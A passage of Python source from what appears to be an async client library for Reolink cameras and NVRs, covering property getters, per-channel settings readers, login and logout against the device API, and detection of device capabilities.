dict] = {}\n self._ptz_position: dict[int, dict] = {}\n self._email_settings: dict[int, dict] = {}\n self._ir_settings: dict[int, dict] = {}\n self._status_led_settings: dict[int, dict] = {}\n self._whiteled_settings: dict[int, dict] = {}\n self._recording_settings: dict[int, dict] = {}\n self._md_alarm_settings: dict[int, dict] = {}\n self._ai_alarm_settings: dict[int, dict] = {}\n self._audio_settings: dict[int, dict] = {}\n self._audio_alarm_settings: dict[int, dict] = {}\n self._buzzer_settings: dict[int, dict] = {}\n self._auto_track_settings: dict[int, dict] = {}\n self._auto_track_range: dict[int, dict] = {}\n self._auto_track_limits: dict[int, dict] = {}\n self._audio_file_list: dict[int, dict] = {}\n self._auto_reply_settings: dict[int, dict] = {}\n\n ##############################################################################\n # States\n self._motion_detection_states: dict[int, bool] = {}\n self._ai_detection_support: dict[int, dict[str, bool]] = {}\n\n ##############################################################################\n # Camera-level states\n self._ai_detection_states: dict[int, dict[str, bool]] = {}\n self._visitor_states: dict[int, bool] = {}\n\n ##############################################################################\n # SUBSCRIPTION managing\n self._subscribe_url: Optional[str] = None\n\n self._subscription_manager_url: dict[str, str] = {}\n self._subscription_termination_time: dict[str, datetime] = {}\n self._subscription_time_difference: dict[str, float] = {}\n self._onvif_only_motion = {SubType.push: True, SubType.long_poll: True}\n self._log_once: list[str] = []\n\n ##############################################################################\n # Properties\n @property\n def host(self) -> str:\n return self._host\n\n @property\n def username(self) -> str:\n return self._username\n\n @property\n def use_https(self) -> Optional[bool]:\n return self._use_https\n\n @property\n def port(self) -> Optional[int]:\n return self._port\n\n @property\n def onvif_port(self) -> Optional[int]:\n return self._onvif_port\n\n @property\n def rtmp_port(self) -> Optional[int]:\n return self._rtmp_port\n\n @property\n def rtsp_port(self) -> Optional[int]:\n return self._rtsp_port\n\n @property\n def onvif_enabled(self) -> Optional[bool]:\n return self._onvif_enabled\n\n @property\n def rtmp_enabled(self) -> Optional[bool]:\n return self._rtmp_enabled\n\n @property\n def rtsp_enabled(self) -> Optional[bool]:\n return self._rtsp_enabled\n\n @property\n def mac_address(self) -> Optional[str]:\n return self._mac_address\n\n @property\n def serial(self) -> Optional[str]:\n return self._nvr_serial\n\n @property\n def wifi_connection(self) -> bool:\n \"\"\"LAN or Wifi\"\"\"\n if self._local_link is None:\n return False\n\n return self._local_link[\"LocalLink\"][\"activeLink\"] != \"LAN\"\n\n @property\n def wifi_signal(self) -> Optional[int]:\n \"\"\"wifi_signal 0-4\"\"\"\n return self._wifi_signal\n\n @property\n def is_nvr(self) -> bool:\n return self._is_nvr\n\n @property\n def nvr_name(self) -> Optional[str]:\n if not self._is_nvr and self._nvr_name == \"\":\n if len(self._channels) > 0 and self._channels[0] in self._channel_names:\n return self._channel_names[self._channels[0]]\n\n return \"Unknown\"\n return self._nvr_name\n\n @property\n def sw_version(self) -> Optional[str]:\n return self._nvr_sw_version\n\n @property\n def sw_version_object(self) -> SoftwareVersion:\n if self._nvr_sw_version_object is None:\n return SoftwareVersion(None)\n\n return self._nvr_sw_version_object\n\n @property\n def sw_version_required(self) -> SoftwareVersion:\n \"\"\"Return the minimum required firmware version for proper operation of this library\"\"\"\n if self.model is None or self.hardware_version is None:\n return SoftwareVersion(None)\n\n return SoftwareVersion(MINIMUM_FIRMWARE.get(self.model, {}).get(self.hardware_version))\n\n @property\n def sw_version_update_required(self) -> bool:\n \"\"\"Check if a firmware version update is required for proper operation of this library\"\"\"\n if self._nvr_sw_version_object is None:\n return False\n\n return not self._nvr_sw_version_object >= self.sw_version_required # pylint: disable=unneeded-not\n\n @property\n def model(self) -> Optional[str]:\n return self._nvr_model\n\n @property\n def hardware_version(self) -> Optional[str]:\n return self._nvr_hw_version\n\n @property\n def manufacturer(self) -> str:\n return MANUFACTURER\n\n @property\n def num_channels(self) -> int:\n \"\"\"Return the total number of channels in the NVR (should be 1 for a standalone camera, maybe 2 for DUO cameras).\"\"\"\n return self._nvr_num_channels\n\n @property\n def num_cameras(self) -> int:\n \"\"\"Return the number of channels IN USE in that NVR (should be 1 for a standalone camera, maybe 2 for DUO cameras).\"\"\"\n return len(self._channels)\n\n @property\n def channels(self) -> list[int]:\n \"\"\"Return the list of indices of channels in use.\"\"\"\n return self._channels\n\n @property\n def stream_channels(self) -> list[int]:\n \"\"\"Return the list of indices of stream channels available.\"\"\"\n return self._stream_channels\n\n @property\n def hdd_info(self) -> Optional[dict]:\n return self._hdd_info\n\n @property\n def stream(self) -> str:\n return self._stream\n\n @property\n def protocol(self) -> str:\n return self._protocol\n\n @property\n def session_active(self) -> bool:\n if self._token is not None and self._lease_time is not None and self._lease_time > (datetime.now() + timedelta(seconds=5)):\n return True\n return False\n\n @property\n def timeout(self) -> float:\n if self._timeout.total is None:\n return DEFAULT_TIMEOUT\n return self._timeout.total\n\n @property\n def user_level(self) -> str:\n \"\"\"Check if the user has admin authorisation.\"\"\"\n if self._users is None or len(self._users) < 1:\n return \"unknown\"\n\n for user in self._users:\n if user[\"userName\"] == self._username:\n return user[\"level\"]\n\n return \"unknown\"\n\n @property\n def is_admin(self) -> bool:\n \"\"\"\n Check if the user has admin authorisation.\n Only admin users can change camera settings, not everything will work if account is not admin\n \"\"\"\n return self.user_level == \"admin\"\n\n def timezone(self) -> Optional[tzinfo]:\n \"\"\"Get the timezone of the device\n\n Returns None if there is no current time information\n \"\"\"\n if self._time_settings is None:\n return None\n return typings.Reolink_timezone(self._time_settings)\n\n def time(self) -> Optional[datetime]:\n \"\"\"Get the approximate \"current\" time of the device using existing data.\n\n Returns None if there is no current time information.\n\n When None is returned async_get_time can be used to request the current camera time\n \"\"\"\n if self._time_settings is None:\n return None\n # the _host_time_difference is basically the diff in \"localtime\" between the system and the device\n # so we will add that then set the tzinfo to our timezone rule so the resulting time\n # can be converted to other timezones correctly\n return (datetime.now() + timedelta(seconds=self._host_time_difference)).replace(tzinfo=self.timezone())\n\n async def async_get_time(self) -> datetime:\n \"\"\"Get the current time of the device\n\n The preferred method is to check get_time first, and if it returns none; call this, to save\n an async round trip to the device.\n \"\"\"\n await self.get_state(\"GetTime\")\n if self._time_settings is None:\n raise NotSupportedError(f\"get_time: failed to retrieve current time settings from {self._host}:{self._port}\")\n return reolink_time_to_datetime(self._time_settings[\"Time\"]).replace(tzinfo=self.timezone())\n\n ##############################################################################\n # Channel-level getters/setters\n\n def camera_name(self, channel: int | None) -> Optional[str]:\n if channel is None:\n return self.nvr_name\n\n if channel not in self._channel_names and channel in self._stream_channels and channel != 0:\n return self.camera_name(0) # Dual lens cameras\n if channel not in self._channel_names:\n if len(self._channels) == 1:\n return self.nvr_name\n return \"Unknown\"\n return self._channel_names[channel]\n\n def camera_model(self, channel: int) -> Optional[str]:\n if channel not in self._channel_models and channel in self._stream_channels and channel != 0:\n return self.camera_model(0) # Dual lens cameras\n if channel not in self._channel_models:\n return \"Unknown\"\n return self._channel_models[channel]\n\n def is_doorbell(self, channel: int) -> bool:\n \"\"\"Wether or not the camera is a doorbell\"\"\"\n return channel in self._is_doorbell and self._is_doorbell[channel]\n\n def motion_detected(self, channel: int) -> bool:\n \"\"\"Return the motion detection state (polled).\"\"\"\n return channel in self._motion_detection_states and self._motion_detection_states[channel]\n\n def ai_detected(self, channel: int, object_type: str) -> bool:\n \"\"\"Return the AI object detection state (polled).\"\"\"\n if channel not in self._ai_detection_states or self._ai_detection_states[channel] is None:\n return False\n\n for key, value in self._ai_detection_states[channel].items():\n if key == object_type or (object_type == PERSON_DETECTION_TYPE and key == \"people\") or (object_type == PET_DETECTION_TYPE and key == \"dog_cat\"):\n return value\n\n return False\n\n def ai_detection_states(self, channel: int) -> dict[str, bool]:\n \"\"\"Return all the AI object detection state.\"\"\"\n return self._ai_detection_states[channel]\n\n def visitor_detected(self, channel: int) -> bool:\n \"\"\"Return the visitor detection state (polled).\"\"\"\n return channel in self._visitor_states and self._visitor_states[channel]\n\n def ai_supported(self, channel: int, object_type: Optional[str] = None) -> bool:\n \"\"\"Return if the AI object type detection is supported or not.\"\"\"\n if channel not in self._ai_detection_support or not self._ai_detection_support[channel]:\n return False\n\n if object_type is not None:\n for key, value in self._ai_detection_support[channel].items():\n if key == object_type or (object_type == PERSON_DETECTION_TYPE and key == \"people\") or (object_type == PET_DETECTION_TYPE and key == \"dog_cat\"):\n return value\n return False\n\n return True\n\n def ai_supported_types(self, channel: int) -> list[str]:\n \"\"\"Return a list of supported AI types.\"\"\"\n if channel not in self._ai_detection_support:\n return []\n\n ai_types = []\n for key, value in self._ai_detection_support[channel].items():\n if value:\n ai_types.append(key)\n\n return ai_types\n\n def audio_alarm_enabled(self, channel: int) -> bool:\n if channel not in self._audio_alarm_settings:\n return False\n\n if self.api_version(\"GetAudioAlarm\") >= 1:\n return self._audio_alarm_settings[channel][\"Audio\"][\"enable\"] == 1\n\n return self._audio_alarm_settings[channel][\"Audio\"][\"schedule\"][\"enable\"] == 1\n\n def ir_enabled(self, channel: int) -> bool:\n return channel in self._ir_settings and self._ir_settings[channel][\"IrLights\"][\"state\"] == \"Auto\"\n\n def status_led_enabled(self, channel: int) -> bool:\n if channel not in self._status_led_settings:\n return False\n\n if self.is_doorbell(channel):\n return self._status_led_settings[channel][\"PowerLed\"].get(\"eDoorbellLightState\", \"Off\") == \"On\"\n\n return self._status_led_settings[channel][\"PowerLed\"].get(\"state\", \"Off\") == \"On\"\n\n def doorbell_led(self, channel: int) -> str:\n if channel not in self._status_led_settings:\n return \"Off\"\n\n return self._status_led_settings[channel][\"PowerLed\"].get(\"eDoorbellLightState\", \"Off\")\n\n def ftp_enabled(self, channel: int | None = None) -> bool:\n if channel is None:\n if self.api_version(\"GetFtp\") >= 1:\n return all(self._ftp_settings[ch][\"Ftp\"][\"enable\"] == 1 for ch in self._channels if ch in self._ftp_settings)\n\n return all(self._ftp_settings[ch][\"Ftp\"][\"schedule\"][\"enable\"] == 1 for ch in self._channels if ch in self._ftp_settings)\n\n if channel not in self._ftp_settings:\n return False\n\n if self.api_version(\"GetFtp\") >= 1:\n return self._ftp_settings[channel][\"Ftp\"][\"scheduleEnable\"] == 1\n\n return self._ftp_settings[channel][\"Ftp\"][\"schedule\"][\"enable\"] == 1\n\n def email_enabled(self, channel: int | None = None) -> bool:\n if channel is None:\n if self.api_version(\"GetEmail\") >= 1:\n return all(self._email_settings[ch][\"Email\"][\"enable\"] == 1 for ch in self._channels if ch in self._email_settings)\n\n return all(self._email_settings[ch][\"Email\"][\"schedule\"][\"enable\"] == 1 for ch in self._channels if ch in self._email_settings)\n\n if channel not in self._email_settings:\n return False\n\n if self.api_version(\"GetEmail\") >= 1:\n return self._email_settings[channel][\"Email\"][\"scheduleEnable\"] == 1\n\n return self._email_settings[channel][\"Email\"][\"schedule\"][\"enable\"] == 1\n\n def push_enabled(self, channel: int | None = None) -> bool:\n if channel is None:\n if self.api_version(\"GetPush\") >= 1:\n return all(self._push_settings[ch][\"Push\"][\"enable\"] == 1 for ch in self._channels if ch in self._push_settings)\n\n return all(self._push_settings[ch][\"Push\"][\"schedule\"][\"enable\"] == 1 for ch in self._channels if ch in self._push_settings)\n\n if channel not in self._push_settings:\n return False\n\n if self.api_version(\"GetPush\") >= 1:\n return self._push_settings[channel][\"Push\"][\"scheduleEnable\"] == 1\n\n return self._push_settings[channel][\"Push\"][\"schedule\"][\"enable\"] == 1\n\n def recording_enabled(self, channel: int | None = None) -> bool:\n if channel is None:\n if self.api_version(\"GetRec\") >= 1:\n return all(self._recording_settings[ch][\"Rec\"][\"enable\"] == 1 for ch in self._channels if ch in self._recording_settings)\n\n return all(self._recording_settings[ch][\"Rec\"][\"schedule\"][\"enable\"] == 1 for ch in self._channels if ch in self._recording_settings)\n\n if channel not in self._recording_settings:\n return False\n\n if self.api_version(\"GetRec\") >= 1:\n return self._recording_settings[channel][\"Rec\"][\"scheduleEnable\"] == 1\n\n return self._recording_settings[channel][\"Rec\"][\"schedule\"][\"enable\"] == 1\n\n def buzzer_enabled(self, channel: int | None = None) -> bool:\n if channel is None:\n return all(self._buzzer_settings[ch][\"Buzzer\"][\"enable\"] == 1 for ch in self._channels if ch in self._buzzer_settings)\n\n if channel not in self._buzzer_settings:\n return False\n\n return self._buzzer_settings[channel][\"Buzzer\"][\"scheduleEnable\"] == 1\n\n def whiteled_state(self, channel: int) -> bool:\n return channel in self._whiteled_settings and self._whiteled_settings[channel][\"WhiteLed\"][\"state\"] == 1\n\n def whiteled_mode(self, channel: int) -> Optional[int]:\n if channel not in self._whiteled_settings:\n return None\n\n return self._whiteled_settings[channel][\"WhiteLed\"].get(\"mode\")\n\n def whiteled_mode_list(self, channel: int) -> list[str]:\n mode_values = [SpotlightModeEnum.off, SpotlightModeEnum.auto, SpotlightModeEnum.schedule]\n if self.api_version(\"supportLightAutoBrightness\", channel) > 0:\n mode_values.extend([SpotlightModeEnum.adaptive, SpotlightModeEnum.autoadaptive])\n return [val.name for val in mode_values]\n\n def whiteled_brightness(self, channel: int) -> Optional[int]:\n if channel not in self._whiteled_settings:\n return None\n\n return self._whiteled_settings[channel][\"WhiteLed\"].get(\"bright\")\n\n def whiteled_schedule(self, channel: int) -> Optional[dict]:\n \"\"\"Return the spotlight state.\"\"\"\n if channel in self._whiteled_settings:\n return self._whiteled_settings[channel][\"WhiteLed\"][\"LightingSchedule\"]\n\n return None\n\n def whiteled_settings(self, channel: int) -> Optional[dict]:\n \"\"\"Return the spotlight state.\"\"\"\n if channel in self._whiteled_settings:\n return self._whiteled_settings[channel]\n\n return None\n\n def daynight_state(self, channel: int) -> Optional[str]:\n if channel not in self._isp_settings:\n return None\n\n return self._isp_settings[channel][\"Isp\"][\"dayNight\"]\n\n def backlight_state(self, channel: int) -> Optional[str]:\n if channel not in self._isp_settings:\n return None\n\n return self._isp_settings[channel][\"Isp\"][\"backLight\"]\n\n def audio_record(self, channel: int) -> bool:\n if channel not in self._enc_settings:\n return False\n\n return self._enc_settings[channel][\"Enc\"][\"audio\"] == 1\n\n def volume(self, channel: int) -> int:\n if channel not in self._audio_settings:\n return 100\n\n return self._audio_settings[channel][\"AudioCfg\"][\"volume\"]\n\n def doorbell_button_sound(self, channel: int) -> bool:\n if channel not in self._audio_settings:\n return False\n\n return self._audio_settings[channel][\"AudioCfg\"].get(\"visitorLoudspeaker\") == 1\n\n def quick_reply_dict(self, channel: int) -> dict[int, str]:\n if channel not in self._audio_file_list:\n return {}\n\n audio_dict = {-1: \"off\"}\n for audio_file in self._audio_file_list[channel][\"AudioFileList\"]:\n audio_dict[audio_file[\"id\"]] = audio_file[\"fileName\"]\n return audio_dict\n\n def quick_reply_enabled(self, channel: int) -> bool:\n if channel not in self._auto_reply_settings:\n return False\n\n return self._auto_reply_settings[channel][\"AutoReply\"][\"enable\"] == 1\n\n def quick_reply_file(self, channel: int) -> int | None:\n \"\"\"Return the quick replay audio file id, -1 means quick replay is off.\"\"\"\n if channel not in self._auto_reply_settings:\n return None\n\n return self._auto_reply_settings[channel][\"AutoReply\"][\"fileId\"]\n\n def quick_reply_time(self, channel: int) -> int:\n if channel not in self._auto_reply_settings:\n return 0\n\n return self._auto_reply_settings[channel][\"AutoReply\"][\"timeout\"]\n\n def audio_alarm_settings(self, channel: int) -> dict:\n if channel in self._audio_alarm_settings:\n return self._audio_alarm_settings[channel]\n\n return {}\n\n def md_sensitivity(self, channel: int) -> int:\n if channel not in self._md_alarm_settings:\n return 0\n\n if self.api_version(\"GetMdAlarm\") >= 1:\n if self._md_alarm_settings[channel][\"MdAlarm\"].get(\"useNewSens\", 0) == 1:\n return 51 - self._md_alarm_settings[channel][\"MdAlarm\"][\"newSens\"][\"sensDef\"]\n\n sensitivities = [sens[\"sensitivity\"] for sens in self._md_alarm_settings[channel][\"MdAlarm\"][\"sens\"]]\n return 51 - mean(sensitivities)\n\n sensitivities = [sens[\"sensitivity\"] for sens in self._md_alarm_settings[channel][\"Alarm\"][\"sens\"]]\n return 51 - mean(sensitivities)\n\n def ai_sensitivity(self, channel: int, ai_type: str) -> int:\n if channel not in self._ai_alarm_settings or ai_type not in self._ai_alarm_settings[channel]:\n return 0\n\n return self._ai_alarm_settings[channel][ai_type][\"sensitivity\"]\n\n def ai_delay(self, channel: int, ai_type: str) -> int:\n \"\"\"AI detection delay time in seconds\"\"\"\n if channel not in self._ai_alarm_settings or ai_type not in self._ai_alarm_settings[channel]:\n return 0\n\n return self._ai_alarm_settings[channel][ai_type][\"stay_time\"]\n\n def zoom_range(self, channel: int) -> dict:\n return self._zoom_focus_range[channel]\n\n def enable_https(self, enable: bool):\n self._use_https = enable\n self.refresh_base_url()\n\n def refresh_base_url(self):\n if self._use_https:\n self._url = f\"https://{self._host}:{self._port}/cgi-bin/api.cgi\"\n else:\n self._url = f\"http://{self._host}:{self._port}/cgi-bin/api.cgi\"\n\n async def login(self) -> None:\n if self._port is None or self._use_https is None:\n await self._login_try_ports()\n return # succes\n\n if self._token is not None and self._lease_time is not None and self._lease_time > (datetime.now() + timedelta(seconds=300)):\n return # succes\n\n await self._login_mutex.acquire()\n try:\n if self._token is not None and self._lease_time is not None and self._lease_time > (datetime.now() + timedelta(seconds=300)):\n _LOGGER.debug(\n \"Host %s:%s, after login mutex aquired, login already completed by another coroutine\",\n self._host,\n self._port,\n )\n return # succes, in case multiple async coroutine are waiting on login_mutex.acquire\n\n await self.logout(login_mutex_owned=True) # Ensure there would be no \"max session\" error\n\n _LOGGER.debug(\n \"Host %s:%s, trying to login with user %s...\",\n self._host,\n self._port,\n self._username,\n )\n\n body: typings.reolink_json = [\n {\n \"cmd\": \"Login\",\n \"action\": 0,\n \"param\": {\n \"User\": {\n \"userName\": self._username,\n \"password\": self._password,\n }\n },\n }\n ]\n param = {\"cmd\": \"Login\"}\n\n try:\n json_data = await self.send(body, param, expected_response_type=\"json\")\n except ApiError as err:\n raise LoginError(f\"API error during login of host {self._host}:{self._port}: {str(err)}\") from err\n except ReolinkConnectionError as err:\n raise LoginError(f\"Client connector error during login of host {self._host}:{self._port}: {str(err)}\") from err\n except InvalidContentTypeError as err:\n raise LoginError(f\"Invalid content error during login of host {self._host}:{self._port}: {str(err)}\") from err\n except NoDataError as err:\n raise LoginError(f\"Error receiving Reolink login response of host {self._host}:{self._port}\") from err\n\n _LOGGER.debug(\"Got login response from %s:%s: %s\", self._host, self._port, json_data)\n\n try:\n if json_data[0][\"code\"] != 0:\n raise LoginError(f\"API returned error code {json_data[0]['code']} during login of host {self._host}:{self._port}\")\n\n self._lease_time = datetime.now() + timedelta(seconds=float(json_data[0][\"value\"][\"Token\"][\"leaseTime\"]))\n self._token = str(json_data[0][\"value\"][\"Token\"][\"name\"])\n except Exception as err:\n self.clear_token()\n raise LoginError(f\"Login error, unknown response format from host {self._host}:{self._port}: {json_data}\") from err\n\n _LOGGER.debug(\n \"Logged in at host %s:%s. Leasetime %s, token %s\",\n self._host,\n self._port,\n self._lease_time.strftime(\"%d-%m-%Y %H:%M\"),\n self._token,\n )\n # Looks like some devices fail with not-logged-in if subsequent command sent with no delay, not sure 100% though...\n # I've seen RLC-520A failed with 0.5s, but did not try to set more. Need to gather some more logging data from users...\n # asyncio.sleep(0.5)\n return # succes\n finally:\n self._login_mutex.release()\n\n async def _login_try_ports(self) -> None:\n self._port = 443\n self.enable_https(True)\n try:\n await self.login()\n return\n except LoginError:\n pass\n\n self._port = 80\n self.enable_https(False)\n await self.login()\n\n async def logout(self, login_mutex_owned=False):\n body = [{\"cmd\": \"Logout\", \"action\": 0, \"param\": {}}]\n\n if not login_mutex_owned:\n await self._login_mutex.acquire()\n\n try:\n if self._token:\n param = {\"cmd\": \"Logout\"}\n try:\n # logout sometimes responds with a string of seemingly random caracters, which are always the same for a given camera.\n await self.send(body, param, expected_response_type=\"text/html\")\n except ReolinkError as err:\n _LOGGER.warning(\"Error while logging out: %s\", str(err))\n # Reolink has a bug in some cameras' firmware: the Logout command issued without a token breaks the subsequent commands:\n # even if Login command issued AFTER that successfully returns a token, any command with that token would return \"Please login first\" error.\n # Thus it is not available for now to exit the previous \"stuck\" sessions after sudden crash or power failure:\n # Reolink has restricted amount of sessions on a device, so in such case the component would not be able to login\n # into a device before some previos session expires an hour later...\n # If Reolink fixes this and makes Logout work with login/pass pair instead of a token - this can be uncommented...\n # else:\n # body = [{\"cmd\": \"Logout\", \"action\": 0, \"param\": {\"User\": {\"userName\": self._username, \"password\": self._password}}}]\n # param = {\"cmd\": \"Logout\"}\n # await self.send(body, param, expected_response_type = \"text/html\")\n\n self.clear_token()\n if not login_mutex_owned:\n await self._aiohttp_session.close()\n finally:\n if not login_mutex_owned:\n self._login_mutex.release()\n\n async def expire_session(self, unsubscribe: bool = True):\n if self._lease_time is not None:\n self._lease_time = datetime.now() - timedelta(seconds=5)\n if unsubscribe:\n await self.unsubscribe()\n await self._aiohttp_session.close()\n\n def clear_token(self):\n self._token = None\n self._lease_time = None\n\n def construct_capabilities(self, warnings=True) -> None:\n \"\"\"Construct the capabilities list of the NVR/camera.\"\"\"\n # Host capabilities\n self._capabilities[\"Host\"] = []\n\n if self.api_version(\"onvif\") > 0 and self._onvif_port is not None:\n self._capabilities[\"Host\"].append(\"ONVIF\")\n if self.api_version(\"rtsp\") > 0 and self._rtsp_port is not None:\n self._capabilities[\"Host\"].append(\"RTSP\")\n if self.api_version(\"rtmp\") > 0 and self._rtmp_port is not None:\n self._capabilities[\"Host\"].append(\"RTMP\")\n\n if self.sw_version_object.date > datetime(year=2021, month=6, day=1):\n # Check if this camera publishes its inital state upon ONVIF subscription\n self._capabilities[\"Host\"].append(\"initial_ONVIF_state\")\n\n if self._ftp_settings:\n self._capabilities[\"Host\"].append(\"ftp\")\n\n if self._push_settings:\n self._capabilities[\"Host\"].append(\"push\")\n\n if self._recording_settings:\n self._capabilities[\"Host\"].append(\"recording\")\n\n if self._email_settings:\n self._capabilities[\"Host\"].append(\"email\")\n\n if self.api_version(\"supportBuzzer\") > 0:\n self._capabilities[\"Host\"].append(\"buzzer\")\n\n if self.api_version(\"upgrade\") >= 2:\n self._capabilities[\"Host\"].append(\"update\")\n\n if self.api_version(\"wifi\") > 0:\n self._capabilities[\"Host\"].append(\"wifi\")\n\n if self.api_version(\"reboot\") > 0:\n self._capabilities[\"Host\"].append(\"reboot\")\n\n # Channel capabilities\n for channel in self._channels:\n self._capabilities[channel] = []\n\n if self.is_nvr and self.api_version(\"supportAutoTrackStream\", channel) > 0:\n self._capabilities[channel].append(\"autotrack_stream\")\n\n if channel in self._motion_detection_states:\n self._capabilities[channel].append(\"motion_detection\")\n\n if channel > 0 and self.model in DUAL_LENS_DUAL_MOTION_MODELS:\n continue\n\n if channel in self._ftp_settings and (self.api_version(\"GetFtp\") < 1 or \"scheduleEnable\" in self._ftp_settings[channel][\"Ftp\"]):\n self._capabilities[channel].append(\"ftp\")\n\n if channel in self._push_settings and (self.api_version(\"GetPush\") < 1 or \"scheduleEnable\" in self._push_settings[channel][\"Push\"]):\n self._capabilities[channel].append(\"push\")\n\n if channel in self._recording_settings and (self.api_version(\"GetRec\") < 1 or \"scheduleEnable\" in self._recording_settings[channel][\"Rec\"]):\n self._capabilities[channel].append(\"recording\")\n\n if channel in self._email_settings and (self.api_version(\"GetEmail\") < 1 or \"scheduleEnable\" in self._email_settings[channel][\"Email\"]):\n self._capabilities[channel].append(\"email\")\n\n if channel in self._buzzer_settings and self.api_version(\"supportBuzzer\") > 0 and \"scheduleEnable\" in self._buzzer_settings[channel][\"Buzzer\"]:\n self._capabilities[channel].append(\"buzzer\")\n\n if self.api_version(\"ledControl\", channel) > 0 and channel in self._ir_settings:\n self._capabilities[channel].append(\"ir_lights\")\n\n if self.api_version(\"powerLed\", channel) > 0:\n # powerLed == statusLed = doorbell_led\n self._capabilities[channel].append(\"status_led\") # internal use only\n self._capabilities[channel].append(\"power_led\")\n if self.api_version(\"supportDoorbellLight\", channel) > 0 or self.is_doorbell(channel):\n # powerLed == statusLed = doorbell_led\n self._capabilities[channel].append(\"status_led\") # internal use only\n self._capabilities[channel].append(\"doorbell_led\")\n\n if self.api_version(\"GetWhiteLed\") > 0 and (\n self.api_version(\"floodLight\", channel) > 0 or self.api_version(\"supportFLswitch\", channel) > 0 or self.api_version(\"supportFLBrightness\", channel) > 0\n ):\n # floodlight == spotlight == WhiteLed\n self._capabilities[channel].append(\"floodLight\")\n\n if self.api_version(\"GetAudioCfg\") > 0:\n self._capabilities[channel].append(\"volume\")\n if self.api_version(\"supportVisitorLoudspeaker\", channel) > 0:\n self._capabilities[channel].append(\"doorbell_button_sound\")\n\n if (self.api_version(\"supportAudioFileList\", channel) > 0 and self.api_version(\"supportAutoReply\", channel) > 0) or (\n not self.is_nvr and self.api_version(\"supportAudioFileList\") > 0 and self.api_version(\"supportAutoReply\") > 0\n ):\n self._capabilities[channel].append(\"quick_reply\")\n\n if self.api_version(\"alarmAudio\", channel) > 0 and channel in self._audio_alarm_settings:\n self._capabilities[channel].append(\"siren\")\n self._capabilities[channel].append(\"siren_play\") # if self.api_version(\"supportAoAdjust\", channel) > 0\n\n if self.audio_record(channel) is not None:\n self._capabilities[channel].append(\"audio\")\n\n ptz_ver = self.api_version(\"ptzType\", channel)\n if ptz_ver != 0:\n self._capabilities[channel].append(\"ptz\")\n if ptz_ver in [1, 2, 5]:\n self._capabilities[channel].append(\"zoom_basic\")\n min_zoom = self._zoom_focus_range.get(channel, {}).get(\"zoom\", {}).get(\"pos\", {}).get(\"min\")\n max_zoom = self._zoom_focus_range.get(channel, {}).get(\"zoom\", {}).get(\"pos\", {}).get(\"max\")\n if min_zoom is None or max_zoom is None:\n if warnings:\n _LOGGER.warning(\"Camera %s reported to support zoom, but zoom range not available\", self.camera_name(channel))\n else:\n self._capabilities[channel].append(\"zoom\")\n self._capabilities[channel].append(\"focus\")\n if self.api_version(\"disableAutoFocus\", channel) > 0:\n self._capabilities[channel].append(\"auto_focus\")\n if ptz_ver in [2, 3, 5]:\n self._capabilities[channel].append(\"tilt\")\n if ptz_ver in [2, 3, 5, 7]:\n self._capabilities[channel].append(\"pan_tilt\")\n self._capabilities[channel].append(\"pan\")\n if self.api_version(\"supportPtzCalibration\", channel) > 0 or self.api_version(\"supportPtzCheck\", channel) > 0:\n self._capabilities[channel].append(\"ptz_callibrate\")\n if self.api_version(\"GetPtzGuard\", channel) > 0:\n self._capabilities[channel].append(\"ptz_guard\")\n if self.api_version(\"GetPtzCurPos\", channel) > 0:\n self._capabilities[channel].append(\"ptz_position\")\n if ptz_ver in [2, 3]:\n self._capabilities[channel].append(\"ptz_speed\")\n if channel in self._ptz_presets and len(self._ptz_presets[channel]) != 0:\n self._capabilities[channel].append(\"ptz_presets\")\n\n if self.api_version(\"supportDigitalZoom\", channel) > 0 and \"zoom\" not in self._capabilities[channel]:\n self._capabilities[channel].append(\"zoom_basic\")\n min_zoom = self._zoom_focus_range.get(channel, {}).get(\"zoom\", {}).get(\"pos\", {}).get(\"min\")\n max_zoom = self._zoom_focus_range.get(channel, {}).get(\"zoom\", {}).get(\"pos\", {}).get(\"max\")\n if min_zoom is not None and max_zoom is not None:\n self._capabilities[channel].append(\"zoom\")\n else:\n if warnings:\n _LOGGER.warning(\"Camera %s reported to support zoom, but zoom range not available\", self.camera_name(channel))\n\n if self.api_version(\"aiTrack\", channel) > 0:\n self._capabilities[channel].append(\"auto_track\")\n track_method = self._auto_track_range.get(channel, {}).get(\"aiTrack\", False)\n if isinstance(track_method, list):\n if len(track_method) > 1 and sorted(track_method) != [0, 1]:\n self._capabilities[channel].append(\"auto_track_method\")\n if self.auto_track_disappear_time(channel) > 0:\n self._capabilities[channel].append(\"auto_track_disappear_time\")\n if self.auto_track_stop_time(channel) > 0:\n self._capabilities[channel].append(\"auto_track_stop_time\")\n\n if self.api_version(\"supportAITrackLimit\", channel) > 0:\n self._capabilities[channel].append(\"auto_track_limit\")\n\n if channel in self._md_alarm_settings:\n self._capabilities[channel].append(\"md_sensitivity\")\n\n if self.api_version(\"supportAiSensitivity\", channel) > 0:\n self._capabilities[channel].append(\"ai_sensitivity\")\n\n if self.api_version(\"supportAiStayTime\", channel) > 0:\n self._capabilities[channel].append(\"ai_delay\")\n\n if self.api_version(\"ispHue\", channel) > 0:\n self._capabilities[channel].append(\"isp_hue\")\n if self.api_version(\"ispSatruation\", channel) > 0:\n self._capabilities[channel].append(\"isp_satruation\")\n if self.api_version(\"ispSharpen\", channel) > 0:\n self._capabilities[channel].append(\"isp_sharpen\")\n if self.api_version(\"ispContrast\", channel) > 0:\n self._capabilities[channel].append(\"isp_contrast\")\n if self.api_version(\"ispBright\", channel) > 0:\n self._capabilities[channel].append(\"isp_bright\")\n\n if self.api_version(\"ispDayNight\", channel, no_key_return=1) > 0 and self.daynight_state(channel) is not None:\n self._capabilities[channel].append(\"dayNight\")\n\n if self.backlight_state(channel) is not None:\n self._capabilities[channel].append(\"backLight\")\n\n def supported(self, channel: int | None, capability: str) -> bool:\n \"\"\"Return if a capability is supported by a camera channel.\"\"\"\n if channel is None:\n return capability in self._capabilities[\"Host\"]\n\n if channel not in self._capabilities:\n return False\n\n return capability in self._capabilities[channel]\n\n def api_version(self, capability: str, channel: int | None = None, no_key_return: int = 0) -> int:\n \"\"\"Return the api version of a capability, 0=not supported, >0 is supported\"\"\"\n if capability in self._api_version:\n return self._api_version[capability]\n\n if channel is None:\n return self._abilities.get(capability, {}).get(\"ver\", 0)\n\n if channel >= len(self._abilities[\"abilityChn\"]):\n return 0\n\n return self._abilities[\"abilityChn\"][channel].get(capability, {}).get(\"ver\", no_key_return)\n\n async def get_state(self, cmd: str) -> None:\n body = []\n channels = []\n for channel in self._stream_channels:\n ch_body = []\n if cmd == \"GetEnc\":\n ch_body = [{\"cmd\": \"GetEnc\", \"action\": 0, \"param\": {\"channel\": 